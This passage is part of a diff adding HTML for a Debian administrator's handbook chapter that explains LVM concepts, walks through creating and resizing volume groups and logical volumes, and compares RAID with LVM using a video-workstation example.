+              id="id-1.15.4.7.2"
+              class="indexterm"></a><a
+              id="id-1.15.4.7.3"
+              class="indexterm"></a><div
+              class="para">
+				LVM, the <span
+                class="emphasis"><em>Logical Volume Manager</em></span>, is another approach to abstracting logical volumes from their physical supports, which focuses on increasing flexibility rather than increasing reliability. LVM allows changing a logical volume transparently as far as the applications are concerned; for instance, it is possible to add new disks, migrate the data to them, and remove the old disks, without unmounting the volume.
+			</div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.lvm-concepts"></a>12.1.2.1. LVM Concepts</h4></div></div></div><div
+                class="para">
+					This flexibility is attained by a level of abstraction involving three concepts.
+				</div><div
+                class="para">
+					First, the PV (<span
+                  class="emphasis"><em>Physical Volume</em></span>) is the entity closest to the hardware: it can be partitions on a disk, or a full disk, or even any other block device (including, for instance, a RAID array). Note that when a physical element is set up to be a PV for LVM, it should only be accessed via LVM, otherwise the system will get confused.
+				</div><div
+                class="para">
+					A number of PVs can be clustered in a VG (<span
+                  class="emphasis"><em>Volume Group</em></span>), which can be compared to disks both virtual and extensible. VGs are abstract, and don't appear in a device file in the <code
+                  class="filename">/dev</code> hierarchy, so there's no risk of using them directly.
+				</div><div
+                class="para">
+					The third kind of object is the LV (<span
+                  class="emphasis"><em>Logical Volume</em></span>), which is a chunk of a VG; if we keep the VG-as-disk analogy, the LV compares to a partition. The LV appears as a block device with an entry in <code
+                  class="filename">/dev</code>, and it can be used as any other physical partition can be (most commonly, to host a filesystem or swap space).
+				</div><div
+                class="para">
+					The important thing is that the splitting of a VG into LVs is entirely independent of its physical components (the PVs). A VG with only a single physical component (a disk for instance) can be split into a dozen logical volumes; similarly, a VG can use several physical disks and appear as a single large logical volume. The only constraint, obviously, is that the total size allocated to LVs can't be bigger than the total capacity of the PVs in the volume group.
+				</div><div
+                class="para">
+					It often makes sense, however, to have some kind of homogeneity among the physical components of a VG, and to split the VG into logical volumes that will have similar usage patterns. For instance, if the available hardware includes fast disks and slower disks, the fast ones could be clustered into one VG and the slower ones into another; chunks of the first one can then be assigned to applications requiring fast data access, while the second one will be kept for less demanding tasks.
+				</div><div
+                class="para">
+					In any case, keep in mind that an LV isn't particularly attached to any one PV. It is possible to influence where the data from an LV are physically stored, but this possibility isn't required for day-to-day use. On the contrary: when the set of physical components of a VG evolves, the physical storage locations corresponding to a particular LV can be migrated across disks (while staying within the PVs assigned to the VG, of course).
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.lvm-setup"></a>12.1.2.2. Setting up LVM</h4></div></div></div><div
+                class="para">
+					Let us now follow, step by step, the process of setting up LVM for a typical use case: we want to simplify a complex storage situation. Such a situation usually happens after some long and convoluted history of accumulated temporary measures. For the purposes of illustration, we'll consider a server where the storage needs have changed over time, ending up in a maze of available partitions split over several partially used disks. In more concrete terms, the following partitions are available:
+				</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+							on the <code
+                        class="filename">sdb</code> disk, a <code
+                        class="filename">sdb2</code> partition, 4 GB;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							on the <code
+                        class="filename">sdc</code> disk, a <code
+                        class="filename">sdc3</code> partition, 3 GB;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							the <code
+                        class="filename">sdd</code> disk, 4 GB, is fully available;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							on the <code
+                        class="filename">sdf</code> disk, a <code
+                        class="filename">sdf1</code> partition, 4 GB; and a <code
+                        class="filename">sdf2</code> partition, 5 GB.
+						</div></li></ul></div><div
+                class="para">
+					In addition, let's assume that disks <code
+                  class="filename">sdb</code> and <code
+                  class="filename">sdf</code> are faster than the other two.
+				</div><div
+                class="para">
+					Our goal is to set up three logical volumes for three different applications: a file server requiring 5 GB of storage space, a database (1 GB) and some space for back-ups (12 GB). The first two need good performance, but back-ups are less critical in terms of access speed. All these constraints prevent the use of partitions on their own; using LVM can abstract the physical size of the devices, so the only limit is the total available space.
+				</div><div
+                class="para">
+					The required tools are in the <span
+                  class="pkg pkg">lvm2</span> package and its dependencies. When they're installed, setting up LVM takes three steps, matching the three levels of concepts.
+				</div><div
+                class="para">
+					First, we prepare the physical volumes using <code
+                  class="command">pvcreate</code>:
+				</div><a
+                xmlns=""
+                id="screen.pvcreate"></a><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>pvdisplay</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>pvcreate /dev/sdb2</code></strong>
+<code
+                  class="computeroutput">  Physical volume "/dev/sdb2" successfully created
+# </code><strong
+                  class="userinput"><code>pvdisplay</code></strong>
+<code
+                  class="computeroutput">  "/dev/sdb2" is a new physical volume of "4.00 GiB"
+  --- NEW Physical volume ---
+  PV Name               /dev/sdb2
+  VG Name               
+  PV Size               4.00 GiB
+  Allocatable           NO
+  PE Size               0   
+  Total PE              0
+  Free PE               0
+  Allocated PE          0
+  PV UUID               0zuiQQ-j1Oe-P593-4tsN-9FGy-TY0d-Quz31I
+
+# </code><strong
+                  class="userinput"><code>for i in sdc3 sdd sdf1 sdf2 ; do pvcreate /dev/$i ; done</code></strong>
+<code
+                  class="computeroutput">  Physical volume "/dev/sdc3" successfully created
+  Physical volume "/dev/sdd" successfully created
+  Physical volume "/dev/sdf1" successfully created
+  Physical volume "/dev/sdf2" successfully created
+# </code><strong
+                  class="userinput"><code>pvdisplay -C</code></strong>
+<code
+                  class="computeroutput">  PV         VG   Fmt  Attr PSize PFree
+  /dev/sdb2       lvm2 ---  4.00g 4.00g
+  /dev/sdc3       lvm2 ---  3.09g 3.09g
+  /dev/sdd        lvm2 ---  4.00g 4.00g
+  /dev/sdf1       lvm2 ---  4.10g 4.10g
+  /dev/sdf2       lvm2 ---  5.22g 5.22g
+</code></pre><div
+                class="para">
+					So far, so good; note that a PV can be set up on a full disk as well as on individual partitions of it. As shown above, the <code
+                  class="command">pvdisplay</code> command lists the existing PVs, with two possible output formats.
+				</div><div
+                class="para">
+					Now let's assemble these physical elements into VGs using <code
+                  class="command">vgcreate</code>. We'll gather only PVs from the fast disks into a <code
+                  class="filename">vg_critical</code> VG; the other VG, <code
+                  class="filename">vg_normal</code>, will also include slower elements.
+				</div><a
+                xmlns=""
+                id="screen.vgcreate"></a><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>vgdisplay</code></strong>
+<code
+                  class="computeroutput">  No volume groups found
+# </code><strong
+                  class="userinput"><code>vgcreate vg_critical /dev/sdb2 /dev/sdf1</code></strong>
+<code
+                  class="computeroutput">  Volume group "vg_critical" successfully created
+# </code><strong
+                  class="userinput"><code>vgdisplay</code></strong>
+<code
+                  class="computeroutput">  --- Volume group ---
+  VG Name               vg_critical
+  System ID             
+  Format                lvm2
+  Metadata Areas        2
+  Metadata Sequence No  1
+  VG Access             read/write
+  VG Status             resizable
+  MAX LV                0
+  Cur LV                0
+  Open LV               0
+  Max PV                0
+  Cur PV                2
+  Act PV                2
+  VG Size               8.09 GiB
+  PE Size               4.00 MiB
+  Total PE              2071
+  Alloc PE / Size       0 / 0   
+  Free  PE / Size       2071 / 8.09 GiB
+  VG UUID               bpq7zO-PzPD-R7HW-V8eN-c10c-S32h-f6rKqp
+
+# </code><strong
+                  class="userinput"><code>vgcreate vg_normal /dev/sdc3 /dev/sdd /dev/sdf2</code></strong>
+<code
+                  class="computeroutput">  Volume group "vg_normal" successfully created
+# </code><strong
+                  class="userinput"><code>vgdisplay -C</code></strong>
+<code
+                  class="computeroutput">  VG          #PV #LV #SN Attr   VSize  VFree 
+  vg_critical   2   0   0 wz--n-  8.09g  8.09g
+  vg_normal     3   0   0 wz--n- 12.30g 12.30g
+</code></pre><div
+                class="para">
+					Here again, commands are rather straightforward (and <code
+                  class="command">vgdisplay</code> proposes two output formats). Note that it is quite possible to use two partitions of the same physical disk into two different VGs. Note also that we used a <code
+                  class="filename">vg_</code> prefix to name our VGs, but it is nothing more than a convention.
+				</div><div
+                class="para">
+					We now have two “virtual disks”, sized about 8 GB and 12 GB, respectively. Let's now carve them up into “virtual partitions” (LVs). This involves the <code
+                  class="command">lvcreate</code> command, and a slightly more complex syntax:
+				</div><a
+                xmlns=""
+                id="screen.lvcreate"></a><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>lvdisplay</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>lvcreate -n lv_files -L 5G vg_critical</code></strong>
+<code
+                  class="computeroutput">  Logical volume "lv_files" created
+# </code><strong
+                  class="userinput"><code>lvdisplay</code></strong>
+<code
+                  class="computeroutput">  --- Logical volume ---
+  LV Path                /dev/vg_critical/lv_files
+  LV Name                lv_files
+  VG Name                vg_critical
+  LV UUID                J3V0oE-cBYO-KyDe-5e0m-3f70-nv0S-kCWbpT
+  LV Write Access        read/write
+  LV Creation host, time mirwiz, 2015-06-10 06:10:50 -0400
+  LV Status              available
+  # open                 0
+  LV Size                5.00 GiB
+  Current LE             1280
+  Segments               2
+  Allocation             inherit
+  Read ahead sectors     auto
+  - currently set to     256
+  Block device           253:0
+
+# </code><strong
+                  class="userinput"><code>lvcreate -n lv_base -L 1G vg_critical</code></strong>
+<code
+                  class="computeroutput">  Logical volume "lv_base" created
+# </code><strong
+                  class="userinput"><code>lvcreate -n lv_backups -L 12G vg_normal</code></strong>
+<code
+                  class="computeroutput">  Logical volume "lv_backups" created
+# </code><strong
+                  class="userinput"><code>lvdisplay -C</code></strong>
+<code
+                  class="computeroutput">  LV         VG          Attr     LSize  Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_base    vg_critical -wi-a---  1.00g                                           
+  lv_files   vg_critical -wi-a---  5.00g                                           
+  lv_backups vg_normal   -wi-a--- 12.00g</code></pre><div
+                class="para">
+					Two parameters are required when creating logical volumes; they must be passed to the <code
+                  class="command">lvcreate</code> as options. The name of the LV to be created is specified with the <code
+                  class="literal">-n</code> option, and its size is generally given using the <code
+                  class="literal">-L</code> option. We also need to tell the command what VG to operate on, of course, hence the last parameter on the command line.
+				</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>GOING FURTHER</em></span> <code
+                            class="command">lvcreate</code> options</strong></p></div></div></div><div
+                  class="para">
+					The <code
+                    class="command">lvcreate</code> command has several options to allow tweaking how the LV is created.
+				</div><div
+                  class="para">
+					Let's first describe the <code
+                    class="literal">-l</code> option, with which the LV's size can be given as a number of blocks (as opposed to the “human” units we used above). These blocks (called PEs, <span
+                    class="emphasis"><em>physical extents</em></span>, in LVM terms) are contiguous units of storage space in PVs, and they can't be split across LVs. When one wants to define storage space for an LV with some precision, for instance to use the full available space, the <code
+                    class="literal">-l</code> option will probably be preferred over <code
+                    class="literal">-L</code>.
+				</div><div
+                  class="para">
+					It's also possible to hint at the physical location of an LV, so that its extents are stored on a particular PV (while staying within the ones assigned to the VG, of course). Since we know that <code
+                    class="filename">sdb</code> is faster than <code
+                    class="filename">sdf</code>, we may want to store the <code
+                    class="filename">lv_base</code> there if we want to give an advantage to the database server compared to the file server. The command line becomes: <code
+                    class="command">lvcreate -n lv_base -L 1G vg_critical /dev/sdb2</code>. Note that this command can fail if the PV doesn't have enough free extents. In our example, we would probably have to create <code
+                    class="filename">lv_base</code> before <code
+                    class="filename">lv_files</code> to avoid this situation – or free up some space on <code
+                    class="filename">sdb2</code> with the <code
+                    class="command">pvmove</code> command.
+				</div></div><div
+                class="para">
+					Logical volumes, once created, end up as block device files in <code
+                  class="filename">/dev/mapper/</code>:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>ls -l /dev/mapper</code></strong>
+<code
+                  class="computeroutput">total 0
+crw------- 1 root root 10, 236 Jun 10 16:52 control
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_critical-lv_base -&gt; ../dm-1
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_critical-lv_files -&gt; ../dm-0
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_normal-lv_backups -&gt; ../dm-2
+# </code><strong
+                  class="userinput"><code>ls -l /dev/dm-*</code></strong>
+<code
+                  class="computeroutput">brw-rw---T 1 root disk 253, 0 Jun 10 17:05 /dev/dm-0
+brw-rw---- 1 root disk 253, 1 Jun 10 17:05 /dev/dm-1
+brw-rw---- 1 root disk 253, 2 Jun 10 17:05 /dev/dm-2
+</code></pre><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>NOTE</em></span> Autodetecting LVM volumes</strong></p></div></div></div><div
+                  class="para">
+					When the computer boots, the <code
+                    class="filename">lvm2-activation</code> systemd service unit executes <code
+                    class="command">vgchange -aay</code> to “activate” the volume groups: it scans the available devices; those that have been initialized as physical volumes for LVM are registered into the LVM subsystem, those that belong to volume groups are assembled, and the relevant logical volumes are started and made available. There is therefore no need to edit configuration files when creating or modifying LVM volumes.
+				</div><div
+                  class="para">
+					Note, however, that the layout of the LVM elements (physical and logical volumes, and volume groups) is backed up in <code
+                    class="filename">/etc/lvm/backup</code>, which can be useful in case of a problem (or just to sneak a peek under the hood).
+				</div></div><div
+                class="para">
+					To make things easier, convenience symbolic links are also created in directories matching the VGs:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>ls -l /dev/vg_critical</code></strong>
+<code
+                  class="computeroutput">total 0
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_base -&gt; ../dm-1
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_files -&gt; ../dm-0
+# </code><strong
+                  class="userinput"><code>ls -l /dev/vg_normal</code></strong>
+<code
+                  class="computeroutput">total 0
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_backups -&gt; ../dm-2</code></pre><div
+                class="para">
+					The LVs can then be used exactly like standard partitions:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mkfs.ext4 /dev/vg_normal/lv_backups</code></strong>
+<code
+                  class="computeroutput">mke2fs 1.42.12 (29-Aug-2014)
+Creating filesystem with 3145728 4k blocks and 786432 inodes
+Filesystem UUID: b5236976-e0e2-462e-81f5-0ae835ddab1d
+[...]
+Creating journal (32768 blocks): done
+Writing superblocks and filesystem accounting information: done 
+# </code><strong
+                  class="userinput"><code>mkdir /srv/backups</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mount /dev/vg_normal/lv_backups /srv/backups</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>df -h /srv/backups</code></strong>
+<code
+                  class="computeroutput">Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_normal-lv_backups   12G   30M   12G   1% /srv/backups
+# </code><strong
+                  class="userinput"><code>[...]</code></strong>
+<code
+                  class="computeroutput">[...]
+# </code><strong
+                  class="userinput"><code>cat /etc/fstab</code></strong>
+<code
+                  class="computeroutput">[...]
+/dev/vg_critical/lv_base    /srv/base       ext4 defaults 0 2
+/dev/vg_critical/lv_files   /srv/files      ext4 defaults 0 2
+/dev/vg_normal/lv_backups   /srv/backups    ext4 defaults 0 2</code></pre><div
+                class="para">
+					From the applications' point of view, the myriad small partitions have now been abstracted into one large 12 GB volume, with a friendlier name.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.lvm-over-time"></a>12.1.2.3. LVM Over Time</h4></div></div></div><div
+                class="para">
+					Even though the ability to aggregate partitions or physical disks is convenient, this is not the main advantage brought by LVM. The flexibility it brings is especially noticed as time passes, when needs evolve. In our example, let's assume that new large files must be stored, and that the LV dedicated to the file server is too small to contain them. Since we haven't used the whole space available in <code
+                  class="filename">vg_critical</code>, we can grow <code
+                  class="filename">lv_files</code>. For that purpose, we'll use the <code
+                  class="command">lvresize</code> command, then <code
+                  class="command">resize2fs</code> to adapt the filesystem accordingly:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>df -h /srv/files/</code></strong>
+<code
+                  class="computeroutput">Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_files  5.0G  4.6G  146M  97% /srv/files
+# </code><strong
+                  class="userinput"><code>lvdisplay -C vg_critical/lv_files</code></strong>
+<code
+                  class="computeroutput">  LV       VG          Attr     LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_files vg_critical -wi-ao-- 5.00g
+# </code><strong
+                  class="userinput"><code>vgdisplay -C vg_critical</code></strong>
+<code
+                  class="computeroutput">  VG          #PV #LV #SN Attr   VSize VFree
+  vg_critical   2   2   0 wz--n- 8.09g 2.09g
+# </code><strong
+                  class="userinput"><code>lvresize -L 7G vg_critical/lv_files</code></strong>
+<code
+                  class="computeroutput">  Size of logical volume vg_critical/lv_files changed from 5.00 GiB (1280 extents) to 7.00 GiB (1792 extents).
+  Logical volume lv_files successfully resized
+# </code><strong
+                  class="userinput"><code>lvdisplay -C vg_critical/lv_files</code></strong>
+<code
+                  class="computeroutput">  LV       VG          Attr     LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_files vg_critical -wi-ao-- 7.00g
+# </code><strong
+                  class="userinput"><code>resize2fs /dev/vg_critical/lv_files</code></strong>
+<code
+                  class="computeroutput">resize2fs 1.42.12 (29-Aug-2014)
+Filesystem at /dev/vg_critical/lv_files is mounted on /srv/files; on-line resizing required
+old_desc_blocks = 1, new_desc_blocks = 1
+The filesystem on /dev/vg_critical/lv_files is now 1835008 (4k) blocks long.
+
+# </code><strong
+                  class="userinput"><code>df -h /srv/files/</code></strong>
+<code
+                  class="computeroutput">Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_files  6.9G  4.6G  2.1G  70% /srv/files</code></pre><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>CAUTION</em></span> Resizing filesystems</strong></p></div></div></div><div
+                  class="para">
+					Not all filesystems can be resized online; resizing a volume can therefore require unmounting the filesystem first and remounting it afterwards. Of course, if one wants to shrink the space allocated to an LV, the filesystem must be shrunk first; the order is reversed when the resizing goes in the other direction: the logical volume must be grown before the filesystem on it. It's rather straightforward, since at no time must the filesystem size be larger than the block device where it resides (whether that device is a physical partition or a logical volume).
+				</div><div
+                  class="para">
+					The ext3, ext4 and xfs filesystems can be grown online, without unmounting; shrinking requires an unmount. The reiserfs filesystem allows online resizing in both directions. The venerable ext2 allows neither, and always requires unmounting.
+				</div></div><div
+                class="para">
+					We could proceed in a similar fashion to extend the volume hosting the database, only we've reached the VG's available space limit:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>df -h /srv/base/</code></strong>
+<code
+                  class="computeroutput">Filesystem                       Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_base 1008M  854M  104M  90% /srv/base
+# </code><strong
+                  class="userinput"><code>vgdisplay -C vg_critical</code></strong>
+<code
+                  class="computeroutput">  VG          #PV #LV #SN Attr   VSize VFree 
+  vg_critical   2   2   0 wz--n- 8.09g 92.00m</code></pre><div
+                class="para">
+					No matter, since LVM allows adding physical volumes to existing volume groups. For instance, maybe we've noticed that the <code
+                  class="filename">sdb1</code> partition, which was so far used outside of LVM, only contained archives that could be moved to <code
+                  class="filename">lv_backups</code>. We can now recycle it and integrate it to the volume group, and thereby reclaim some available space. This is the purpose of the <code
+                  class="command">vgextend</code> command. Of course, the partition must be prepared as a physical volume beforehand. Once the VG has been extended, we can use similar commands as previously to grow the logical volume then the filesystem:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>pvcreate /dev/sdb1</code></strong>
+<code
+                  class="computeroutput">  Physical volume "/dev/sdb1" successfully created
+# </code><strong
+                  class="userinput"><code>vgextend vg_critical /dev/sdb1</code></strong>
+<code
+                  class="computeroutput">  Volume group "vg_critical" successfully extended
+# </code><strong
+                  class="userinput"><code>vgdisplay -C vg_critical</code></strong>
+<code
+                  class="computeroutput">  VG          #PV #LV #SN Attr   VSize VFree
+  vg_critical   3   2   0 wz--n- 9.09g 1.09g
+# </code><strong
+                  class="userinput"><code>[...]</code></strong>
+<code
+                  class="computeroutput">[...]
+# </code><strong
+                  class="userinput"><code>df -h /srv/base/</code></strong>
+<code
+                  class="computeroutput">Filesystem                       Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_base  2.0G  854M  1.1G  45% /srv/base</code></pre><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>GOING FURTHER</em></span> Advanced LVM</strong></p></div></div></div><div
+                  class="para">
+					LVM also caters for more advanced uses, where many details can be specified by hand. For instance, an administrator can tweak the size of the blocks that make up physical and logical volumes, as well as their physical layout. It is also possible to move blocks across PVs, for instance to fine-tune performance or, in a more mundane way, to free a PV when one needs to extract the corresponding physical disk from the VG (whether to affect it to another VG or to remove it from LVM altogether). The manual pages describing the commands are generally clear and detailed. A good entry point is the <span
+                    class="citerefentry"><span
+                      class="refentrytitle">lvm</span>(8)</span> manual page.
+				</div></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.raid-or-lvm"></a>12.1.3. RAID or LVM?</h3></div></div></div><div
+              class="para">
+				RAID and LVM both bring indisputable advantages as soon as one leaves the simple case of a desktop computer with a single hard disk where the usage pattern doesn't change over time. However, RAID and LVM go in two different directions, with diverging goals, and it is legitimate to wonder which one should be adopted. The most appropriate answer will of course depend on current and foreseeable requirements.
+			</div><div
+              class="para">
+				There are a few simple cases where the question doesn't really arise. If the requirement is to safeguard data against hardware failures, then obviously RAID will be set up on a redundant array of disks, since LVM doesn't really address this problem. If, on the other hand, the need is for a flexible storage scheme where the volumes are made independent of the physical layout of the disks, RAID doesn't help much and LVM will be the natural choice.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> If performance matters…</strong></p></div></div></div><div
+                class="para">
+				If input/output speed is of the essence, especially in terms of access times, using LVM and/or RAID in one of the many combinations may have some impact on performances, and this may influence decisions as to which to pick. However, these differences in performance are really minor, and will only be measurable in a few use cases. If performance matters, the best gain to be obtained would be to use non-rotating storage media (<a
+                  id="id-1.15.4.8.4.2.1"
+                  class="indexterm"></a><span
+                  class="emphasis"><em>solid-state drives</em></span> or SSDs); their cost per megabyte is higher than that of standard hard disk drives, and their capacity is usually smaller, but they provide excellent performance for random accesses. If the usage pattern includes many input/output operations scattered all around the filesystem, for instance for databases where complex queries are routinely being run, then the advantage of running them on an SSD far outweigh whatever could be gained by picking LVM over RAID or the reverse. In these situations, the choice should be determined by other considerations than pure speed, since the performance aspect is most easily handled by using SSDs.
+			</div></div><div
+              class="para">
+				The third notable use case is when one just wants to aggregate two disks into one volume, either for performance reasons or to have a single filesystem that is larger than any of the available disks. This case can be addressed both by a RAID-0 (or even linear-RAID) and by an LVM volume. When in this situation, and barring extra constraints (for instance, keeping in line with the rest of the computers if they only use RAID), the configuration of choice will often be LVM. The initial set up is barely more complex, and that slight increase in complexity more than makes up for the extra flexibility that LVM brings if the requirements change or if new disks need to be added.
+			</div><div
+              class="para">
+				Then of course, there is the really interesting use case, where the storage system needs to be made both resistant to hardware failure and flexible when it comes to volume allocation. Neither RAID nor LVM can address both requirements on their own; no matter, this is where we use both at the same time — or rather, one on top of the other. The scheme that has all but become a standard since RAID and LVM have reached maturity is to ensure data redundancy first by grouping disks in a small number of large RAID arrays, and to use these RAID arrays as LVM physical volumes; logical partitions will then be carved from these LVs for filesystems. The selling point of this setup is that when a disk fails, only a small number of RAID arrays will need to be reconstructed, thereby limiting the time spent by the administrator for recovery.
+			</div><div
+              class="para">
+				Let's take a concrete example: the public relations department at Falcot Corp needs a workstation for video editing, but the department's budget doesn't allow investing in high-end hardware from the bottom up. A decision is made to favor the hardware that is specific to the graphic nature of the work (monitor and video card), and to stay with generic hardware for storage. However, as is widely known, digital video does have some particular requirements for its storage: the amount of data to store is large, and the throughput rate for reading and writing this data is important for the overall system performance (more than typical access time, for instance). These constraints need to be fulfilled with generic hardware, in this case two 300 GB SATA hard disk drives; the system data must also be made resistant to hardware failure, as well as some of the user data. Edited videoclips must indeed be safe, but video rushes pending editing are less critical, since they're still on the videotapes.
+			</div><div
+              class="para">
+				RAID-1 and LVM are combined to satisfy these constraints. The disks are attached to two different SATA controllers to optimize parallel access and reduce the risk of a simultaneous failure, and they therefore appear as <code
+                class="filename">sda</code> and <code
+                class="filename">sdc</code>. They are partitioned identically along the following scheme:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>fdisk -l /dev/sda</code></strong>
+<code
+                class="computeroutput">
+Disk /dev/sda: 300 GB, 300090728448 bytes, 586114704 sectors
+Units: sectors of 1 * 512 = 512 bytes
+Sector size (logical/physical): 512 bytes / 512 bytes
+I/O size (minimum/optimal): 512 bytes / 512 bytes
+Disklabel type: dos
+Disk identifier: 0x00039a9f
+
+Device    Boot     Start       End   Sectors Size Id Type
+/dev/sda1 *         2048   1992060   1990012 1.0G fd Linux raid autodetect
+/dev/sda2        1992061   3984120   1992059 1.0G 82 Linux swap / Solaris
+/dev/sda3        4000185 586099395 582099210 298G 5  Extended
+/dev/sda5        4000185 203977305 199977120 102G fd Linux raid autodetect
+/dev/sda6      203977306 403970490 199993184 102G fd Linux raid autodetect
+/dev/sda7      403970491 586099395 182128904  93G 8e Linux LVM</code></pre><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						The first partitions of both disks (about 1 GB) are assembled into a RAID-1 volume, <code
+                      class="filename">md0</code>. This mirror is directly used to store the root filesystem.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						The <code
+                      class="filename">sda2</code> and <code
+                      class="filename">sdc2</code> partitions are used as swap partitions, providing a total 2 GB of swap space. With 1 GB of RAM, the workstation has a comfortable amount of available memory.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						The <code
+                      class="filename">sda5</code> and <code
+                      class="filename">sdc5</code> partitions, as well as <code
+                      class="filename">sda6</code> and <code
+                      class="filename">sdc6</code>, are assembled into two new RAID-1 volumes of about 100 GB each, <code
+                      class="filename">md1</code> and <code
+                      class="filename">md2</code>. Both these mirrors are initialized as physical volumes for LVM, and assigned to the <code
+                      class="filename">vg_raid</code> volume group. This VG thus contains about 200 GB of safe space.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						The remaining partitions, <code
+                      class="filename">sda7</code> and <code
+                      class="filename">sdc7</code>, are directly used as physical volumes, and assigned to another VG called <code
+                      class="filename">vg_bulk</code>, which therefore ends up with roughly 200 GB of space.
+					</div></li></ul></div><div
+              class="para">
+				Once the VGs are created, they can be partitioned in a very flexible way. One must keep in mind that LVs created in <code
+                class="filename">vg_raid</code> will be preserved even if one of the disks fails, which will not be the case for LVs created in <code
+                class="filename">vg_bulk</code>; on the other hand, the latter will be allocated in parallel on both disks, which allows higher read or write speeds for large files.
+			</div><div
+              class="para">
+				We will therefore create the <code
+                class="filename">lv_usr</code>, <code
+                class="filename">lv_var</code> and <code
+                class="filename">lv_home</code> LVs on <code
+                class="filename">vg_raid</code>, to host the matching filesystems; another large LV, <code
+                class="filename">lv_movies</code>, will be used to host the definitive versions of movies after editing. The other VG will be split into a large <code
+                class="filename">lv_rushes</code>, for data straight out of the digital video cameras, and a <code
+                class="filename">lv_tmp</code> for temporary files. The location of the work area is a less straightforward choice to make: while good performance is needed for that volume, is it worth risking losing work if a disk fails during an editing session? Depending on the answer to that question, the relevant LV will be created on one VG or the other.
+			</div><div
+              class="para">
+				We now have both some redundancy for important data and much flexibility in how the available space is split across the applications. Should new software be installed later on (for editing audio clips, for instance), the LV hosting <code
+                class="filename">/usr/</code> can be grown painlessly.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> Why three RAID-1 volumes?</strong></p></div></div></div><div
+                class="para">
+				We could have set up one RAID-1 volume only, to serve as a physical volume for <code
+                  class="filename">vg_raid</code>. Why create three of them, then?
+			</div><div
+                class="para">
+				The rationale for the first split (<code
+                  class="filename">md0</code> vs. the others) is about data safety: data written to both elements of a RAID-1 mirror are exactly the same, and it is therefore possible to bypass the RAID layer and mount one of the disks directly. In case of a kernel bug, for instance, or if the LVM metadata become corrupted, it is still possible to boot a minimal system to access critical data such as the layout of disks in the RAID and LVM volumes; the metadata can then be reconstructed and the files can be accessed again, so that the system can be brought back to its nominal state.
+			</div><div
+                class="para">
+				The rationale for the second split (<code
+                  class="filename">md1</code> vs. <code
+                  class="filename">md2</code>) is less clear-cut, and more related to acknowledging that the future is uncertain. When the workstation is first assembled, the exact storage requirements are not necessarily known with perfect precision; they can also evolve over time. In our case, we can't know in advance the actual storage space requirements for video rushes and complete video clips. If one particular clip needs a very large amount of rushes, and the VG dedicated to redundant data is less than halfway full, we can re-use some of its unneeded space. We can remove one of the physical volumes, say <code
+                  class="filename">md2</code>, from <code
+                  class="filename">vg_raid</code> and either assign it to <code
+                  class="filename">vg_bulk</code> directly (if the expected duration of the operation is short enough that we can live with the temporary drop in performance), or undo the RAID setup on <code
